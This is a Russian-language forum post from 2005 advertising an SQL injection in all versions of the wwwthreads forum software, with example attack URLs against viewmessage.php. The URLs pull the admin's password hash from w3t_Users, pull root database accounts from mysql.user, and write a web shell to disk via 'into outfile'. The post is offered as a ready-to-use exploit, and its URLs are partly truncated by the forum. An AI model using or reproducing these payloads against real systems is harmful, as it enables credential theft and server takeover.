Показать сообщение отдельно

wwwthreads [all versions] - SQL-injection
  #6  
Старый 12.06.2005, 09:06
k00p3r
Banned
Регистрация: 31.05.2005
Сообщений: 549
С нами: 11023586

Репутация: 16


По умолчанию wwwthreads [all versions] - SQL-injection

Уязвимость позволяет получить DES-хеш любого пользователя, создать веб-шелл, получить доступ к важной служебной информации. Использование:

Получение хеша пароля:
http://target/viewmessage.php?Cat=&m...om%20w3t_Users where U_Username='admin'

Получение учетных записей к БД:
http://target/viewmessage.php?Cat=&m...m%20mysql.user where User='root'

Создание веб-шелла (при наличии прав на запись):
http://target/viewmessage.php?Cat=&m...б_шелла into outfile 'path_to_file/file.php'

Источник: www.cyberlords.net
 
Ответить с цитированием